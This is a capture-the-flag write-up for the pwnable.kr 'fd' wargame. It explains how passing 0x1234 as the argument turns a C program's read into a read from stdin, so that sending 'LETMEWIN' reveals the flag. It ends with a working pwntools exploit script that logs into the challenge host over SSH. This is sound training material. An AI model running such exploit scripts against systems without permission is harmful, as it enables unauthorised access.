# fd ## Challenge Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: ssh -p2222 (pw:guest) ## Code Review ```c #include #include #include char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass argv[1] a number\n"); return 0; } int fd = atoi( argv[1] ) - 0x1234; int len = 0; len = read(fd, buf, 32); if(!strcmp("LETMEWIN\n", buf)){ printf("good job :)\n"); system("/bin/cat flag"); exit(0); } printf("learn about Linux file IO\n"); return 0; } ``` Take a look at this portion of the code: ```c int fd = atoi( argv[1] ) - 0x1234; int len = 0; len = read(fd, buf, 32); ``` From man7.org: ![read() syscall](https://223316867-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWVtlSxURaW2QQu6RU5%2Fuploads%2FuiQQaS6WqZaoH6vwl7uo%2Fimage.png?alt=media\&token=cb529e8d-2fdb-425c-acc0-f6f3a6961ae7) ## Solution In Linux, the default **file descriptors** are: * **stdin** (standard input) => 0 * **stdout** (standard output) => 1 * **stderr** (standard error) => 2 We are able to control the value of `fd`. The desirable value is `fd = 0` since it will open a stdin session. We can send information through stdin and that information will be stored in `buf`. The idea is clear: 1. Set `argv[1] = 0x1234` so that `fd = 0`. 2. Send "LETMEWIN" through stdin. ## Exploit ```python #!/usr/bin/env python3 # -*- coding: utf-8 -*- # This exploit template was generated via: # $ pwn template --host pwnable.kr --port 2222 --user fd --password guest --path /home/fd/fd from pwn import * # Set up pwntools for the correct architecture exe = context.binary = ELF('fd') # Many built-in settings can be controlled on the command-line and show up # in "args". For example, to dump all data sent/received, and disable ASLR # for all created processes... # ./exploit.py DEBUG NOASLR # ./exploit.py GDB HOST=example.com PORT=4141 host = args.HOST or 'pwnable.kr' port = int(args.PORT or 2222) user = args.USER or 'fd' password = args.PASSWORD or 'guest' remote_path = '/home/fd/fd' # Connect to the remote SSH server shell = None if not args.LOCAL: shell = ssh(user, host, port, password) shell.set_working_directory(symlink=True) def start_local(argv=[], *a, **kw): '''Execute the target binary locally''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw) def start_remote(argv=[], *a, **kw): '''Execute the target binary on the remote host''' if args.GDB: return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw) else: return shell.process([remote_path] + argv, *a, **kw) def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return start_local(argv, *a, **kw) else: return start_remote(argv, *a, **kw) # Specify your GDB script here for debugging # GDB will be launched if the exploit is run via e.g. # ./exploit.py GDB gdbscript = ''' tbreak main continue '''.format(**locals()) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: i386-32-little # RELRO: Partial RELRO # Stack: No canary found # NX: NX enabled # PIE: No PIE (0x8048000) argv = [str(0x1234)] io = start(argv) io.sendline(b'LETMEWIN') success(io.readall().decode()) ```